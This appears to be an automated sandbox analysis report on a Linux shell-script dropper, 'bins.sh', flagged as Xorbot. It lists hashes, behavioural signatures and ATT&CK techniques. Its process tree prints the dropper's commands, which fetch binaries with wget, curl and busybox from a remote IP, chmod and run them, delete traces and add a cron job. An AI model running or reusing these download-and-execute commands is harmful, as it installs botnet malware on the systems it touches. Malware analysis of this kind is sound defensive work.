Analysis
- max time kernel: 149s
- max time network: 161s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 28/02/2025, 08:07
Static task
- static1
Behavioral tasks
- behavioral1: sample bins.sh, resource ubuntu1804-amd64-20240611-en
- behavioral2: sample bins.sh, resource debian9-armhf-20240611-en
- behavioral3: sample bins.sh, resource debian9-mipsbe-20240729-en
- behavioral4: sample bins.sh, resource debian9-mipsel-20240226-en
General
- Target: bins.sh
- Size: 10KB
- MD5: ef10152fac7e93f56a68778af04b375b
- SHA1: 4270c209c09005b135f3588743b2be59883954db
- SHA256: 09f4674d9d2939b651ef917948770c92e3466dc2a6c7c1aef1636178154cf1a4
- SHA512: 60b92d328a0130a183580bc25aa252a86534a66943b4a906f0bc3881fe8667c4270f12e7b7e9c37748512c3c620a25c4fdfbf3e4ff5aec4f606ab03772254f40
- SSDEEP: 192:S9jIb8YgcVAQQceCjhVH5J85tPhVh0Yg0AQQceCvu:SJIFVAQQceCH5K5bAQQceC2
Malware Config
Signatures
- Xorbot family
  resource: behavioral2/files/fstream-1.dat
  yara_rule: family_xorbot
- Contacts a large (2138) amount of remote hosts (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows (1 TTPs)
  This may indicate a network scan to discover remotely running services.
- File and Directory Permissions Modification (1 TTPs, 2 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid 678: chmod
  pid 696: chmod
- Executes dropped EXE (2 IoCs)
  ioc /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn, pid 679, process bins.sh
  ioc /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf, pid 698, process bins.sh
- Renames itself (1 IoCs)
  pid 699: HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf
- Creates/modifies Cron job (1 TTPs, 1 IoCs)
  Cron allows running tasks on a schedule, and is commonly used for malware persistence.
  File opened for modification: /var/spool/cron/crontabs/tmp.PCvaHV (process crontab)
- Enumerates running processes
  Discovers information about currently running processes on the system.
- Checks CPU configuration (1 TTPs, 2 IoCs)
  Checks CPU information which indicates whether the system is a virtual machine.
  File opened for reading: /proc/cpuinfo (process curl)
  File opened for reading: /proc/cpuinfo (process curl)
- Reads runtime system information
  File opened for reading by process HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf: /proc/975/cmdline, /proc/978/cmdline, /proc/979/cmdline, /proc/43/cmdline, /proc/873/cmdline, /proc/903/cmdline, /proc/905/cmdline, /proc/149/cmdline, /proc/722/cmdline, /proc/782/cmdline, /proc/826/cmdline, /proc/862/cmdline, /proc/912/cmdline, /proc/951/cmdline, /proc/271/cmdline, /proc/737/cmdline, /proc/748/cmdline, /proc/924/cmdline, /proc/5/cmdline, /proc/770/cmdline, /proc/791/cmdline, /proc/797/cmdline, /proc/887/cmdline, /proc/995/cmdline, /proc/6/cmdline, /proc/725/cmdline, /proc/730/cmdline, /proc/819/cmdline, /proc/932/cmdline, /proc/901/cmdline, /proc/949/cmdline, /proc/145/cmdline, /proc/645/cmdline, /proc/765/cmdline, /proc/885/cmdline, /proc/907/cmdline, /proc/955/cmdline, /proc/963/cmdline, /proc/981/cmdline, /proc/17/cmdline, /proc/739/cmdline, /proc/795/cmdline, /proc/781/cmdline, /proc/786/cmdline, /proc/895/cmdline, /proc/953/cmdline, /proc/596/cmdline, /proc/758/cmdline, /proc/892/cmdline, /proc/998/cmdline, /proc/98/cmdline, /proc/767/cmdline, /proc/796/cmdline, /proc/902/cmdline, /proc/1000/cmdline, /proc/757/cmdline, /proc/863/cmdline, /proc/598/cmdline, /proc/778/cmdline, /proc/788/cmdline, /proc/922/cmdline, /proc/959/cmdline
  File opened for reading by process curl: /proc/sys/crypto/fips_enabled
  File opened for reading by process crontab: /proc/filesystems
- Writes file to tmp directory (6 IoCs)
  Malware often drops required files in the /tmp directory.
  File opened for modification: /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf (process wget)
  File opened for modification: /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf (process curl)
  File opened for modification: /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf (process busybox)
  File opened for modification: /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn (process wget)
  File opened for modification: /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn (process curl)
  File opened for modification: /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn (process busybox)
Processes (indentation shows parent/child depth)
- /tmp/bins.sh: /tmp/bins.sh (PID 647) [Executes dropped EXE]
  - /bin/rm: /bin/rm bins.sh (PID 649)
  - /usr/bin/wget: wget http://37.44.238.88/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn (PID 651) [Writes file to tmp directory]
  - /usr/bin/curl: curl -O http://37.44.238.88/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn (PID 669) [Checks CPU configuration; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://37.44.238.88/bins/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn (PID 676) [Writes file to tmp directory]
  - /bin/chmod: chmod 777 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn (PID 678) [File and Directory Permissions Modification]
  - /tmp/6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn: ./6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn (PID 679)
  - /bin/rm: rm 6wZ6OUWNQPAx1SLGFAQs51pS6KlRG0JqIn (PID 683)
  - /usr/bin/wget: wget http://37.44.238.88/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf (PID 684) [Writes file to tmp directory]
  - /usr/bin/curl: curl -O http://37.44.238.88/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf (PID 686) [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox: /bin/busybox wget http://37.44.238.88/bins/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf (PID 693) [Writes file to tmp directory]
  - /bin/chmod: chmod 777 HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf (PID 696) [File and Directory Permissions Modification]
  - /tmp/HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf: ./HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf (PID 698) [Renames itself; Reads runtime system information]
    - /bin/sh: sh -c "crontab -l" (PID 700)
      - /usr/bin/crontab: crontab -l (PID 702) [Reads runtime system information]
    - /bin/sh: sh -c "crontab -" (PID 703)
      - /usr/bin/crontab: crontab - (PID 705) [Creates/modifies Cron job]
  - /bin/rm: rm HujVqUBPPgjRn3PupQLT5UBbKYAPg8a1Jf (PID 718)
  - /usr/bin/wget: wget http://37.44.238.88/bins/hWHYBvRhtT1f8VRbCvqxcgu6yhHX0Fv0kt (PID 722)
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
- File and Directory Permissions Modification (1)
  - Linux and Mac File and Directory Permissions Modification (1)
- Virtualization/Sandbox Evasion (1)
  - System Checks (1)
Downloads
- Filesize: 122KB
  MD5: cd3d4b9c643e5b473fb4d88ed05f0716
  SHA1: 64ee7a97418583d759eaea8000890cc3bae1b5f4
  SHA256: 0cbb1e62423a82d17a7b1c9def6a5570a8414f36e2623f1d82cd4e6281930944
  SHA512: 164ee6eb1dc167f48a62683700bf3a4787f9ec4b12335e9e30d6670406324d111557b3be22fd6a9689b4f60562c8a3bf62867f2cae86c04cb1b01ee2e219cc52
- Filesize: 177KB
  MD5: 786d75a158fe731feca3880f436082c0
  SHA1: 79ea2734e43d00cdeabed5586b2c1994d02aef3e
  SHA256: 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
  SHA512: 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f
- Filesize: 210B
  MD5: f809326a9910c69f8de182c37dfec4f5
  SHA1: e50747c3475aa60c83c11c49357b389b053e8d68
  SHA256: 2ec2c62082cf967eaa31b41e8554a58a3c1d5d30d8e297b684e66807b2dae37a
  SHA512: a0194a1a7003c0b91e6125df5579414b76a8bfa65b745aec584300b0fe640c1115000c78b5e030f6a421bbe5d929a71b92a0b61de082710115872d117dd992a5